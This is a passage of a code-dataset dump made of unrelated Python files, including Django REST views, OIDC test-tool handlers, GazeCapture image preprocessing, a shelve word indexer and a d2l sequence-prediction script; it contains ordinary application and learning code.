spotify_metaRetriever\n\nclass Tagger():\n\n logger = logging.getLogger(\"TaggerLogger\")\n spotifyRetriever = spotify_metaRetriever()\n\n def __init__(self):\n ch = logging.StreamHandler()\n ch.setLevel(logging.WARNING)\n\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n ch.setFormatter(formatter)\n fhdlr = logging.FileHandler('logs/taggerLog.log')\n fhdlr.setLevel(logging.DEBUG)\n fhdlr.setFormatter(formatter)\n\n self.logger.addHandler(fhdlr)\n self.logger.addHandler(ch)\n\n def tag_song(self, song):\n return self.tag_spotify(song)\n\n def tag_spotify(self, song):\n try:\n metaData = self.spotifyRetriever.retrieve_metadata(song)\n song.fillMetadta(metaData)\n return 0\n except AttributeError as err:\n self.logger.warning(\"Failed to tag: \" + song.filename)\n return -1\n\n","sub_path":"ripper/apolloRipper/tagging/tagger.py","file_name":"tagger.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"556237469","text":"'''\nPipelineDatabase.py - utility functions for working with a database\n===================================================================\n\n'''\n\nimport os\nimport CGATPipelines.Pipeline as P\n\n# set from calling module\nPARAMS = {}\n\n\ndef importFromIterator(\n outfile,\n tablename,\n iterator,\n columns=None,\n indices=None):\n '''import data in *iterator* into *tablename* via temporary file.\n\n '''\n\n tmpfile = P.getTempFile(\".\")\n\n if columns:\n keys, values = zip(*columns.items())\n tmpfile.write(\"\\t\".join(values) + \"\\n\")\n\n for row in iterator:\n if not columns:\n keys = row[0].keys()\n values = keys\n columns = keys\n tmpfile.write(\"\\t\".join(values) + \"\\n\")\n\n tmpfile.write(\"\\t\".join(str(row[x]) for x in keys) + \"\\n\")\n\n tmpfile.close()\n\n if indices:\n indices = \" \".join(\"--add-index=%s\" % x for x in indices)\n else:\n indices = \"\"\n\n tmpfilename = tmpfile.name\n\n statement = '''\n python %(scriptsdir)s/csv2db.py %(csv2db_options)s\n --table=%(tablename)s\n %(indices)s\n < %(tmpfilename)s > %(outfile)s\n '''\n\n P.run()\n\n os.unlink(tmpfilename)\n","sub_path":"CGATPipelines/PipelineDatabase.py","file_name":"PipelineDatabase.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"67770776","text":"from django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth.models import User\nfrom rest_framework.renderers import JSONRenderer\nfrom rest_framework.parsers import JSONParser\nfrom social_network.models import Posts, PostsReactions\nfrom social_network.serializers import PostsSerializer, PostsReactionsSerializer, UserSerializer\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import IsAuthenticated, AllowAny\n\n\n\nclass JSONResponse(HttpResponse):\n \"\"\"\n An HttpResponse that renders its content into JSON.\n \"\"\"\n def __init__(self, data, **kwargs):\n content = JSONRenderer().render(data)\n kwargs['content_type'] = 'application/json'\n super(JSONResponse, self).__init__(content, **kwargs)\n\t\t\n\t\t\n@api_view(['POST'])\n@permission_classes((AllowAny, ))\n@csrf_exempt\ndef user_signup(request):\n data = JSONParser().parse(request)\n serializer = UserSerializer(data=data, context={'request': request})\n if serializer.is_valid():\n serializer.save()\n user = User.objects.get(username = 
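# --- Aside: a hypothetical call to importFromIterator() above. Passing the
# optional `columns` mapping (db column -> header name) fixes the header row
# up front; `rows` is any iterator of dicts sharing those keys. Assumes the
# CGAT PARAMS/csv2db pipeline is configured in the calling module:
rows = iter([{'gene': 'abc1', 'count': 10}, {'gene': 'abc2', 'count': 3}])
importFromIterator('counts.load', 'counts', rows,
                   columns={'gene': 'gene', 'count': 'count'},
                   indices=['gene'])
# --- end aside ---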
data['username'])\n user.set_password(data['password'])\n user.save()\n return JSONResponse(serializer.data)\n else:\n return JSONResponse(serializer.errors, status=400)\n \n \n@api_view(['GET'])\n@permission_classes((IsAuthenticated, ))\n@csrf_exempt\ndef user_list(request):\n if request.method == 'GET':\n user = User.objects.filter(pk=request.user.id)\n serializer = UserSerializer(user, context={'request': request}, many=True)\n return JSONResponse(serializer.data)\n\n@api_view(['GET', 'PUT', 'DELETE'])\n@permission_classes((IsAuthenticated, ))\n@csrf_exempt\ndef user_detail(request, pk):\n try:\n user = User.objects.get(pk=pk, id=request.user.id)\n except User.DoesNotExist:\n return HttpResponse(status=404)\n\n if request.method == 'GET':\n serializer = UserSerializer(user, context={'request': request})\n return JSONResponse(serializer.data)\n\n elif request.method == 'PUT':\n data = JSONParser().parse(request)\n serializer = UserSerializer(user, data=data)\n if serializer.is_valid():\n serializer.save()\n return JSONResponse(serializer.data)\n return JSONResponse(serializer.errors, status=400)\n\n elif request.method == 'DELETE':\n user.delete()\n return HttpResponse(status=204)\n\t\t\n@api_view(['GET', 'POST'])\n@permission_classes((IsAuthenticated, ))\n@csrf_exempt\ndef posts_list(request):\n if request.method == 'GET':\n posts = Posts.objects.filter(user=request.user.id)\n serializer = PostsSerializer(posts, context={'request': request}, many=True)\n return JSONResponse(serializer.data)\n\n elif request.method == 'POST':\n \n data = JSONParser().parse(request)\n data['user'] = request.user.id\n \n serializer = PostsSerializer(data=data)\n if serializer.is_valid():\n serializer.save()\n return JSONResponse(serializer.data, status=201)\n return JSONResponse(serializer.errors, status=400)\n\n@api_view(['GET', 'PUT', 'DELETE'])\n@permission_classes((IsAuthenticated, ))\n@csrf_exempt\ndef posts_detail(request, pk):\n try:\n post = Posts.objects.get(pk=pk, user=request.user.id)\n except Posts.DoesNotExist:\n return HttpResponse(status=404)\n\n if request.method == 'GET':\n serializer = PostsSerializer(post, context={'request': request})\n return JSONResponse(serializer.data)\n\n\n elif request.method == 'PUT':\n data = JSONParser().parse(request)\n data['user'] = request.user.id\n data['post'] = pk\n \n serializer = PostsSerializer(post, data=data)\n if serializer.is_valid():\n serializer.save()\n \n return JSONResponse(serializer.errors, status=400)\n\n elif request.method == 'DELETE':\n post.delete()\n return HttpResponse(status=204)\n\t\t\n@api_view(['PUT'])\n@permission_classes((IsAuthenticated, ))\n@csrf_exempt\ndef posts_reaction(request, pk):\n data = JSONParser().parse(request)\n data['user'] = request.user.id\n data['post'] = pk\n reaction = data.get('like', None)\n if reaction is not None:\n reacted_posts = PostsReactions.objects.filter(post=pk, user=request.user.id)\n if reacted_posts:\n target_post = reacted_posts[0]\n # target_post.like = bool(reaction)\n # import pdb;pdb.set_trace()\n reaction_serializer = PostsReactionsSerializer(target_post, data=data)\n if reaction_serializer.is_valid():\n reaction_serializer.save()\n return JSONResponse(reaction_serializer.data, status=201)\n else:\n # import pdb;pdb.set_trace()\n reaction_serializer = PostsReactionsSerializer(data=data)\n if reaction_serializer.is_valid():\n reaction_serializer.save()\n return JSONResponse(reaction_serializer.data, status=201)\n \n return 
HttpResponse(status=400)","sub_path":"social_network/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"538852384","text":"\"\"\"\nTask_1. In the range of natural numbers from 2 to 99, determine\nhow many of them are divisible by each of the numbers in the range from 2 to 9.\n\nHint: use a nested loop\n\nExample:\nIn range 2-99: 49 numbers are divisible by 2\nIn range 2-99: 33 numbers are divisible by 3\nIn range 2-99: 24 numbers are divisible by 4\nIn range 2-99: 19 numbers are divisible by 5\nIn range 2-99: 16 numbers are divisible by 6\nIn range 2-99: 14 numbers are divisible by 7\nIn range 2-99: 12 numbers are divisible by 8\nIn range 2-99: 11 numbers are divisible by 9\n\"\"\"\n\n\n# for i in range(2, 10):\n#     flag = 0\n#     for j in range(2, 100):\n#         if j % i == 0:\n#             flag += 1\n#     print(f'In range [2-99]: {flag} numbers are divisible by \\'{i}\\'')\n\n\n\n# # Variant #2: via a function\n# def cycle_method(from_n, to_n, from_r, to_r, output_str=''):\n#     for i in range(from_n, to_n + 1):\n#         flag = 0\n#         for j in range(from_r, to_r + 1):\n#             if j % i == 0:\n#                 flag += 1\n#         output_str += f'In range [{from_r}-{to_r}]: {flag} numbers are divisible by \\'{i}\\'\\n'\n#     return output_str\n#\n#\n# from_numb = 2\n# to_numb = 9\n# from_range = 2\n# to_range = 99\n#\n# print(cycle_method(from_numb, to_numb, from_range, to_range))\n\n\n# Variant #3: via recursion\ndef recur_method(from_n, to_n, from_r, to_r, output_str=''):\n    if from_n > to_n:\n        print(output_str)\n        return output_str\n    flag = 0\n    for j in range(from_r, to_r + 1):\n        if j % from_n == 0:\n            flag += 1\n    output_str += f'In range [{from_r}-{to_r}]: {flag} numbers are divisible by \\'{from_n}\\'\\n'\n    return recur_method(from_n + 1, to_n, from_r, to_r, output_str)\n\n\nfrom_numb = 2\nto_numb = 9\nfrom_range = 2\nto_range = 99\n\nrecur_method(from_numb, to_numb, from_range, to_range)\n","sub_path":"Урок 3.Практическое задание/task_1.py","file_name":"task_1.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"277411167","text":"from setuptools import setup\r\n\r\npackage_structure = [\r\n    'socialsim',\r\n    'socialsim.measurements',\r\n    'socialsim.measurements.model_parameters',\r\n    'socialsim.visualizations'\r\n]\r\n\r\npackage_requirements = [\r\n    'pandas',\r\n    'scipy>=1.2.1',\r\n    'scikit-learn>=0.20.2',\r\n    'fastdtw>=0.2.0',\r\n    'pysal>=2.0.0',\r\n    'tqdm>=4.31.1',\r\n    'burst_detection>=0.1.0',\r\n    'tsfresh>=0.11.2',\r\n    'joblib>=0.13.2',\r\n#    'networkx>=2.3',\r\n#    'python-louvain>=0.13'\r\n    'louvain>=0.6.1',\r\n    'cairocffi>=1.0.2'\r\n]\r\n\r\npackage_data = {\r\n    'socialsim.measurements.model_parameters': ['best_model.pkl']\r\n    }\r\n\r\nsetup(name='socialsim',\r\n      version='0.2.1',\r\n      packages=package_structure,\r\n      package_data=package_data,\r\n      license='',\r\n      url='',\r\n      long_description='None',\r\n      maintainer='Zachary New',\r\n      maintainer_email='zachary.new@pnnl.gov',\r\n      install_requires=package_requirements\r\n      )\r\n\r\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"152388903","text":"from tokenization import ToTokenize\r\nfrom tokenization import TokenWithType\r\nimport shelve\r\nimport os\r\n\r\nclass Position:\r\n    def __init__(self, start, end):\r\n        self.start = start\r\n        self.end = end\r\n    \r\n    def __repr__(self):\r\n        \r\n        return str(self.start) + ', ' + str(self.end)\r\n\r\n    def 
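# --- Aside: a quick sanity check of the counts promised in the docstring
# above: for k >= 2 the multiples of k in [2, 99] number exactly 99 // k
# (49 for 2, 33 for 3, ... 11 for 9):
for k in range(2, 10):
    assert sum(1 for j in range(2, 100) if j % k == 0) == 99 // k
# --- end aside ---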
__eq__(self, obj):\r\n\r\n return self.start == obj.start and self.end == obj.end\r\n \r\n\r\nclass ToIndex:\r\n \r\n def __init__(self, db_name):\r\n\r\n self.db = shelve.open(db_name, writeback=True)\r\n\r\n def __del__(self):\r\n\r\n self.db.close()\r\n \r\n def index(self, file_name):\r\n #self.db.clear()\r\n # Raise TypeError if the input type is not string \r\n if not isinstance(file_name, str):\r\n raise(TypeError)\r\n\r\n files = os.listdir()\r\n if file_name not in files:\r\n raise(ValueError)\r\n \r\n tokenizer = ToTokenize()\r\n # Open file\r\n text_file = open(file_name, 'r')\r\n # Read file and save as a string\r\n text_string = text_file.read()\r\n text_file.close()\r\n tokens = tokenizer.tokenize_reduced(text_string)\r\n for token in tokens:\r\n position = Position(token.start, token.start + len(token.wordform))\r\n self.db.setdefault(token.wordform, {}).setdefault(file_name, []).append(position)\r\n\r\n \r\n self.db.sync()\r\n \r\n \r\n\r\n \r\n \r\nif __name__ == '__main__':\r\n a = ToIndex('database')\r\n a.index(\"text.txt\")\r\n a.index(\"text2.txt\")\r\n","sub_path":"indexation.py","file_name":"indexation.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"150286773","text":"import json\nfrom math import ceil, floor\nfrom pathlib import Path\nfrom PIL import Image\nfrom tqdm import tqdm\nimport numpy as np\n\n\ndef read_json(path):\n with open(str(path), 'r') as f:\n return json.load(f)\n\n\ndef load_img(path, size=None): # size = (width, height)\n img = Image.open(path)\n if size:\n img = img.resize(size)\n return img\n\n\ndef get_type(path):\n return read_json(path / 'info.json')['Dataset']\n\n\ndef get_coor(idx, size, face_json, le_json, re_json, fg_json, screen_json):\n w, h = size\n\n if fg_json['IsValid'][idx] == 0:\n return None\n\n if screen_json['Orientation'][idx] != 1:\n return None\n\n fx, fy = floor(face_json['X'][idx]), floor(face_json['Y'][idx])\n fw, fh = ceil(face_json['W'][idx]), ceil(face_json['H'][idx])\n fx_1, fx_2 = (fx), (fx + fw)\n fy_1, fy_2 = (fy), (fy + fh)\n\n if fx < 0 or fy < 0 or fw <= 0 or fh <= 0:\n return None\n\n lx, ly = floor(le_json['X'][idx]), floor(le_json['Y'][idx])\n lw, lh = ceil(le_json['W'][idx]), ceil(le_json['H'][idx])\n rx, ry = floor(re_json['X'][idx]), floor(re_json['Y'][idx])\n rw, rh = ceil(re_json['W'][idx]), ceil(re_json['H'][idx])\n\n if lw <= 0 or lh <= 0:\n return None\n if rw <= 0 or rh <= 0:\n return None\n\n lx_1, lx_2 = (fx + lx), (fx + lx + lw)\n ly_1, ly_2 = (fy + ly), (fy + ly + lh)\n rx_1, rx_2 = (fx + rx), (fx + rx + rw)\n ry_1, ry_2 = (fy + ry), (fy + ry + rh)\n\n if not (0 <= lx_1 < lx_2 <= w and 0 <= ly_1 < ly_2 <= h):\n return None\n if not (0 <= rx_1 < rx_2 <= w and 0 <= ry_1 < ry_2 <= h):\n return None\n\n fg = np.zeros((25, 25), dtype=np.uint8)\n fg_x, fg_y = fg_json['X'][idx] - 1, fg_json['Y'][idx] - 1\n fg_w, fg_h = fg_json['W'][idx], fg_json['H'][idx]\n fg_x1, fg_x2 = (fg_x), (fg_x + fg_w)\n fg_y1, fg_y2 = (fg_y), (fg_y + fg_h)\n fg[fg_y1:fg_y2, fg_x1:fg_x2] = 1\n\n fc_coor = (fx_1, fx_2, fy_1, fy_2)\n le_coor = (lx_1, lx_2, ly_1, ly_2)\n re_coor = (rx_1, rx_2, ry_1, ry_2)\n\n return fc_coor, le_coor, re_coor, fg.flatten()\n\n\ndef gen(subjects, target_dir):\n fc_dir = target_dir / 'fc'\n le_dir = target_dir / 'le'\n re_dir = target_dir / 're'\n target_dir.mkdir(parents=True, exist_ok=True)\n fc_dir.mkdir(exist_ok=True)\n le_dir.mkdir(exist_ok=True)\n re_dir.mkdir(exist_ok=True)\n\n fc_paths, 
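# --- Aside: the shelve database built above maps each wordform to
# {file_name: [Position, ...]}. A lookup sketch (the database name and the
# search word are placeholders):
import shelve
with shelve.open('database') as db:
    for fname, positions in db.get('word', {}).items():
        print(fname, positions)
# --- end aside ---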
le_paths, re_paths, fgs, dots = [], [], [], [], []\n for subject in tqdm(subjects):\n dot_json = read_json(subject / 'dotInfo.json')\n face_json = read_json(subject / 'appleFace.json')\n le_json = read_json(subject / 'appleLeftEye.json')\n re_json = read_json(subject / 'appleRightEye.json')\n fg_json = read_json(subject / 'faceGrid.json')\n screen_json = read_json(subject / 'screen.json')\n # img_paths = sorted((subject / 'frames').iterdir())\n img_paths = (subject / 'frames').iterdir()\n\n for path in img_paths:\n idx = int(path.stem)\n img = load_img(path)\n\n res = get_coor(idx, img.size, face_json, le_json, re_json, fg_json,\n screen_json)\n if not res:\n continue\n fc_coor, le_coor, re_coor, fg = res\n (fx_1, fx_2, fy_1, fy_2) = fc_coor\n (lx_1, lx_2, ly_1, ly_2) = le_coor\n (rx_1, rx_2, ry_1, ry_2) = re_coor\n\n fc_path = (fc_dir / '{:08d}.jpg'.format(len(fc_paths)))\n le_path = (le_dir / '{:08d}.jpg'.format(len(le_paths)))\n re_path = (re_dir / '{:08d}.jpg'.format(len(re_paths)))\n\n fc_paths.append(fc_path.relative_to(target_dir))\n le_paths.append(le_path.relative_to(target_dir))\n re_paths.append(re_path.relative_to(target_dir))\n dots.append((dot_json['XCam'][idx], dot_json['YCam'][idx]))\n fgs.append(fg)\n\n fc_img = img.crop((fx_1, fy_1, fx_2, fy_2))\n le_img = img.crop((lx_1, ly_1, lx_2, ly_2))\n re_img = img.crop((rx_1, ry_1, rx_2, ry_2))\n fc_img.save(fc_path)\n le_img.save(le_path)\n re_img.save(re_path)\n\n with (target_dir / 'fc_list.txt').open('w') as f:\n f.write('\\n'.join(map(str, fc_paths)))\n with (target_dir / 'le_list.txt').open('w') as f:\n f.write('\\n'.join(map(str, le_paths)))\n with (target_dir / 're_list.txt').open('w') as f:\n f.write('\\n'.join(map(str, re_paths)))\n\n dots = np.array(dots, dtype=np.float32)\n fgs = np.array(fgs, dtype=np.uint8)\n np.save(str(target_dir / 'dots.npy'), dots)\n np.save(str(target_dir / 'fgs.npy'), fgs)\n\n\ndataset = Path('../GazeCapture')\n# subjects = sorted([x for x in dataset.iterdir() if x.is_dir()])\nsubjects = [x for x in dataset.iterdir() if x.is_dir()]\ntrain_subjects = [x for x in subjects if get_type(x) == 'train']\nval_subjects = [x for x in subjects if get_type(x) == 'val']\ntest_subjects = [x for x in subjects if get_type(x) == 'test']\n\ngen(train_subjects[:200], Path('./data/train'))\ngen(val_subjects[:50], Path('./data/val'))\n","sub_path":"gen_list.py","file_name":"gen_list.py","file_ext":"py","file_size_in_byte":5021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"570841873","text":"import logging\n\nimport cherrypy\nfrom cherrypy import CherryPyException\nfrom cherrypy import HTTPRedirect\nfrom jwkest import as_bytes\nfrom otest import Break\nfrom otest import exception_trace\nfrom otest.check import CRITICAL\nfrom otest.events import EV_EXCEPTION\nfrom otest.events import EV_FAULT\nfrom otest.events import EV_HTTP_ARGS\nfrom otest.events import EV_RESPONSE\nfrom otest.result import Result\n\nfrom oidctest.tt import conv_response\n\nlogger = logging.getLogger(__name__)\n\nBANNER = \"\"\"\nSomething went wrong! If you know or suspect you know why, then try to\nfix it. 
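# --- Aside: get_coor() above rasterises the face bounding box into a flat
# 25x25 "face grid" mask. The same idea in isolation, with toy numbers:
import numpy as np
fg = np.zeros((25, 25), dtype=np.uint8)
x, y, w, h = 4, 6, 10, 8        # toy grid box (already 1-based corrected)
fg[y:y + h, x:x + w] = 1
flat = fg.flatten()             # length-625 row-major vector
assert flat.sum() == w * h
# --- end aside ---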
If you have no idea, then please tell us at certification@oidf.org\nand we will help you figure it out.\n\"\"\"\n\n\ndef expected_response_mode(conv):\n try:\n response_mode = conv.req.req_args[\"response_mode\"]\n except KeyError:\n if conv.req.req_args[\"response_type\"] == [''] or conv.req.req_args[\"response_type\"] == ['code']:\n response_mode = 'query'\n else:\n response_mode = 'fragment'\n else:\n if isinstance(response_mode, list):\n if len(response_mode):\n response_mode = response_mode[0]\n else:\n raise ValueError(\n 'Unknown response_mode value: {}'.format(response_mode))\n\n return response_mode\n\n\nclass Main(object):\n def __init__(self, tester, flows, webenv, pick_grp, **kwargs):\n self.tester = tester\n self.sh = tester.sh\n self.info = tester.inut\n self.flows = flows\n self.webenv = webenv\n self.pick_grp = pick_grp\n self.kwargs = kwargs\n\n @cherrypy.expose\n def index(self):\n try:\n if self.sh.session_init():\n return as_bytes(self.info.flow_list())\n else:\n try:\n _url = \"{}opresult#{}\".format(self.kwargs['base_url'],\n self.sh[\"testid\"][0])\n cherrypy.HTTPRedirect(_url)\n except KeyError:\n return as_bytes(self.info.flow_list())\n except cherrypy.HTTPRedirect:\n raise\n except Exception as err:\n exception_trace(\"display_test_list\", err)\n cherrypy.HTTPError(message=str(err))\n\n def _cp_dispatch(self, vpath):\n # Only get here if vpath != None\n ent = cherrypy.request.remote.ip\n logger.info('ent:{}, vpath: {}'.format(ent, vpath))\n\n if vpath[0] == 'continue':\n return self.next\n\n if len(vpath) == 1:\n if vpath[0] in self.flows:\n cherrypy.request.params['test'] = vpath.pop(0)\n return self.run\n elif len(vpath) == 2:\n if vpath[0] == 'test_info':\n cherrypy.request.params['test_id'] = vpath[1]\n return self.test_info\n\n def display_exception(self, exception_trace=''):\n \"\"\"\n So far only one known special response type\n\n :param exception_trace:\n :return: Bytes\n \"\"\"\n txt = [80 * '*', '\\n', BANNER, '\\n', 80 * '*', '\\n', '\\n', '\\n']\n txt.extend(exception_trace)\n cherrypy.response.headers['Content-Type'] = 'text/plain'\n return as_bytes(txt)\n\n @cherrypy.expose\n def run(self, test):\n try:\n resp = self.tester.run(test, **self.webenv)\n except HTTPRedirect:\n raise\n except Exception as err:\n #test_id = list(self.flows.complete.keys())[0]\n _trace = exception_trace('run', err, logger)\n self.tester.conv.events.store(EV_FAULT, _trace)\n return self.display_exception(exception_trace=_trace)\n\n self.sh['session_info'] = self.info.session\n\n if isinstance(resp, dict):\n return self.display_exception(**resp)\n elif resp is False or resp is True:\n pass\n elif isinstance(resp, list):\n return conv_response(self.sh.events, resp)\n elif isinstance(resp, bytes):\n return resp\n\n self.opresult()\n\n @cherrypy.expose\n def reset(self):\n self.sh.reset_session()\n return conv_response(self.sh.events, self.info.flow_list())\n\n @cherrypy.expose\n def pedit(self):\n try:\n return as_bytes(self.info.profile_edit())\n except Exception as err:\n return as_bytes(self.info.err_response(\"pedit\", err))\n\n @cherrypy.expose\n def profile(self, **kwargs):\n return as_bytes(self.tester.set_profile(kwargs))\n\n @cherrypy.expose\n def test_info(self, test_id):\n try:\n return as_bytes(self.info.test_info(test_id))\n except KeyError:\n raise cherrypy.HTTPError(404, test_id)\n\n @cherrypy.expose\n def next(self, **kwargs):\n resp = self.tester.cont(**kwargs)\n self.sh['session_info'] = self.info.session\n if resp:\n if isinstance(resp, int):\n if resp == 
CRITICAL:\n exp = self.tester.conv.events.get_data(EV_EXCEPTION)\n if exp:\n raise cherrypy.HTTPError(message=exp[0])\n else:\n self.opresult()\n else:\n return conv_response(self.sh['conv'].events, resp)\n else:\n self.opresult()\n\n @cherrypy.expose\n def display(self):\n return as_bytes(self.info.flow_list())\n\n def opresult(self):\n try:\n # return info.flow_list()\n _url = \"{}display#{}\".format(\n self.webenv['client_info']['base_url'],\n self.pick_grp(self.sh['conv'].test_id))\n\n raise HTTPRedirect(_url, 303)\n except KeyError as err:\n logger.error(err)\n raise CherryPyException(err)\n\n def process_error(self, msg, context):\n # test_id = list(self.flows.complete.keys())[0]\n self.tester.conv.events.store(EV_RESPONSE, msg)\n self.tester.conv.events.store(EV_FAULT, 'Error in {}'.format(context))\n # self.tester.conv.events.store(EV_CONDITION, State('Done', status=OK))\n res = Result(self.sh, self.flows.profile_handler)\n self.tester.store_result(res)\n logger.error('Encountered: {} in \"{}\"'.format(msg, context))\n self.opresult()\n\n @cherrypy.expose\n # @cherrypy.tools.allow(methods=[\"GET\"])\n def authz_cb(self, **kwargs):\n if cherrypy.request.method != 'GET':\n # You should only get query/fragment here using GET\n return self.process_error(\n 'Wrong HTTP method used expected GET got \"{}\". Could be that '\n 'I got a form_post to the wrong redirect_uri'.format(\n cherrypy.request.method), 'authz_cb')\n\n _conv = self.sh[\"conv\"]\n try:\n _response_mode = expected_response_mode(_conv)\n except ValueError as err:\n return self.process_error(err, 'authz_cb')\n\n if _response_mode == \"form_post\":\n return self.process_error(\"Expected form_post, didn't get it\",\n 'authz_cb')\n elif _response_mode == 'fragment':\n try:\n kwargs = cherrypy.request.params\n except KeyError:\n pass\n else:\n _conv.events.store(EV_HTTP_ARGS, kwargs, ref='authz_cb')\n _conv.query_component = kwargs\n\n return self.info.opresult_fragment()\n\n if kwargs == {}: # This should never be the case\n return self.process_error(\n 'Got empty response could be I got something fragment '\n 'encoded. 
Expected query response mode', 'authz_cb')\n\n _conv.events.store(EV_RESPONSE, 'Response URL with query part')\n\n try:\n resp = self.tester.async_response(self.webenv[\"conf\"],\n response=kwargs)\n except cherrypy.HTTPRedirect:\n raise\n except Break:\n resp = False\n self.tester.store_result()\n except Exception as err:\n _trace = exception_trace('authz_cb', err, logger)\n _conv.events.store(EV_FAULT, _trace)\n self.tester.store_result()\n return self.display_exception(exception_trace=_trace)\n\n if resp is False or resp is True:\n pass\n elif isinstance(resp, dict) and 'exception_trace' in resp:\n return self.display_exception(**resp)\n elif not isinstance(resp, int):\n return resp\n\n self.opresult()\n\n @cherrypy.expose\n # @cherrypy.tools.allow(methods=[\"POST\"])\n def authz_post(self, **kwargs):\n if cherrypy.request.method != 'POST':\n return self.process_error(\n 'Wrong HTTP method used expected POST got \"{}\"'.format(\n cherrypy.request.method),\n 'authz_post')\n\n _conv = self.sh[\"conv\"]\n try:\n _response_mode = expected_response_mode(_conv)\n except ValueError as err:\n return self.process_error(err, 'authz_cb')\n\n # Can get here 2 ways, either directly if form_post is used or\n # indirectly if fragment encoding\n if _response_mode == 'query': # should not be here at all\n if 'fragment' in kwargs:\n return self.process_error(\n 'Expected URL with query part got fragment', 'authz_post')\n else:\n return self.process_error(\n 'Expected URL with query part got form_post', 'authz_post')\n elif _response_mode == 'fragment':\n if 'fragment' in kwargs: # everything OK\n self.tester.conv.events.store(EV_RESPONSE,\n 'URL with fragment')\n else:\n return self.process_error(\n 'Expected URL with fragment part got form_post',\n 'authz_post')\n else:\n self.tester.conv.events.store(EV_RESPONSE, 'Form post')\n\n try:\n resp = self.tester.async_response(self.webenv[\"conf\"],\n response=kwargs)\n except cherrypy.HTTPRedirect:\n raise\n except Exception as err:\n _trace = exception_trace('authz_post', err, logger)\n return self.display_exception(exception_trace=_trace)\n # return self.info.err_response(\"authz_cb\", err)\n else:\n if resp is False or resp is True:\n pass\n elif not isinstance(resp, int):\n return resp\n\n self.opresult()\n","sub_path":"src/oidctest/optt/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":10632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"484202431","text":"from d2l import AllDeepLearning as d2l\nfrom mxnet import autograd, gluon, init, nd\nfrom mxnet.gluon import nn\n\nT = 1000\ntime = nd.arange(0, T)\nx = nd.sin(0.01 * time) + 0.2 * nd.random.normal(shape=T)\ntau = 4\nfeatures = nd.zeros((T-tau, tau))\nfor i in range(tau):\n features[:, i] = x[i: T-tau+i]\nlabels = x[tau:]\nbatch_size, n_train = 16, 600\ntrain_iter = d2l.load_array((features[:n_train], labels[:n_train]), batch_size, is_train=True)\ntest_iter = d2l.load_array((features[:n_train], labels[:n_train]), batch_size, is_train=False)\n\n\ndef get_net():\n net = nn.Sequential()\n net.add(nn.Dense(10, activation='relu'),\n nn.Dense(1))\n net.initialize(init.Xavier())\n return net\n\n\nloss = gluon.loss.L2Loss()\n\n\ndef train_net(net, train_iter, test_iter, loss, epochs, lr):\n trainer = gluon.Trainer(net.collect_params(), 'adam', {'learning_rate': lr})\n for epoch in range(1, epochs+1):\n for X, y in train_iter:\n with autograd.record():\n l = loss(net(X), y)\n l.backward()\n trainer.step(batch_size)\n 
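An aside on the lag-feature windowing set up at the top of this script: it turns the scalar series into supervised (features, label) pairs, so that row t of the feature matrix holds x[t..t+tau-1] and the label is x[t+tau]. A minimal NumPy sketch of the same construction, on stand-in data:

import numpy as np

x = np.arange(10.0)   # stand-in series
tau = 4
T = len(x)
feats = np.stack([x[i:T - tau + i] for i in range(tau)], axis=1)
labels = x[tau:]      # feats[t] = x[t:t+tau] predicts labels[t] = x[t+tau]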
print('epoch: %d, loss: %f' % (epoch, d2l.evaluate_loss(net, train_iter, loss)))\n\n\nnet = get_net()\ntrain_net(net, train_iter, test_iter, loss, 10, 0.01)\nestimates = net(features)\n# Multistep prediction has to run after training; beyond n_train the model is fed its own outputs.\nprediction = nd.zeros(T)\nprediction[:n_train] = x[:n_train]\nfor i in range(n_train, T):\n    prediction[i] = net(prediction[i-tau:i].reshape(1, -1)).reshape(1)\n\nk = 33\nfeatures = nd.zeros((k, T-k))\nfor i in range(tau):\n    features[i] = x[i:T-k+i]\nfor i in range(tau, k):\n    features[i] = net(features[i-tau:i].T).T\n\nsteps = [4, 8, 16, 32]\nd2l.plot([time[i:T-k+i] for i in steps], [features[i] for i in steps],\n         legend=[\"step %d\" % i for i in steps], figsize=(4.5, 2.5))\nd2l.plt.show()\n#\n# d2l.plot([time, time[tau:], time[n_train:]],\n#          [x, estimates, prediction[n_train:]],\n#          legend=[\"data\", \"estimates\", \"multistep\"])\n# d2l.plt.show()\n","sub_path":"AILearning/RecurrentNeuronNetwork/SequenNetwork.py","file_name":"SequenNetwork.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"602645397","text":"# Copyright 2022 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"\nrandom augment class\n\"\"\"\nimport numpy as np\nimport mindspore.dataset.vision as vision\nfrom src import transform_utils\n\nIMAGENET_DEFAULT_MEAN = (0.485, 0.456, 0.406)\nIMAGENET_DEFAULT_STD = (0.229, 0.224, 0.225)\n\nclass RandAugment:\n    \"\"\"\n    random augment\n    